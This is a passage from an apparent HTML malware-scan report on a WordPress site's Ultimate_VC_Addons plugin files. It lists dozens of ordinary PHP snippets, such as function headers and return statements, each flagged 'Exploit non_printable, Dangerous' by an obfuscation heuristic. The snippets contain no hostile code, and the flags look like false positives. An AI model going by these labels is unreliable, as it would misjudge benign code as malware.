</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 539</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( ( </span><span style="color: #0000BB">$map_style </span><span style="color: #007700">) ) ) . </span><span style="color: #DD0000">'; var styledMap = new google.maps.StyledMapType(styles,{name: "Styled Map"});'</span><span style="color: #007700">; </span><span style="color: #FF8000">//phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 600</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 608</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 610</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">event</span><span style="color: #007700">, </span><span style="color: #0000BB">ui</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 659</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">toggleBounce</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 685</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_456").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_content_box.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.09 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_457" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_content_box_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons_content_box_css'</span><span style="color: #007700">, </span><span style="color: #DD0000">'content-box' </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons_content_box_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'content-box'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, array( </span><span style="color: #DD0000">'jquery' </span><span style="color: #007700">) ); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Content Box Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 167</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">'] ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 168</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">'] . '</span><span style="color: #007700">;</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Content Box module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_content_box_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_content_box_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to regester scripts</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_content_box_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">' => '</span><span style="color: #0000BB">ease</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_457").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_range_slider.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 25.98 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 16</span><br><table id="file_458" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">range_slider_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons_range_slider_css'</span><span style="color: #007700">, </span><span style="color: #DD0000">'range-slider' </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons_range_slider_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'range-slider'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, array( </span><span style="color: #DD0000">'jquery'</span><span style="color: #007700">, </span><span style="color: #DD0000">'jquery</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Range Slider Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 156</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ? </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_range_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'title_font'</span><span style="color: #007700">] ) : </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Range Slider module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ? </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_range_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'desc_font'</span><span style="color: #007700">] ) : </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 253</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Range Slider Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 260</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_range_slider</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Range Slider Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_range_slider_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 638</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 641</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Range Slider Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 645</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">range_slider_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 661</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_458").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_video_banner.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.22 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_459" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } </span><span style="color: #0000BB">$ultimate_video_banner </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Video_Banner</span><span style="color: #007700">(); if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Video_Banner' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ultimate_Video_Banner </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Heading Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Heading module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Heading Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_video_banner_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Ultimate Heading Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_video_banner_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 387</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 394</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Ultimate Heading Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_video_banner_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
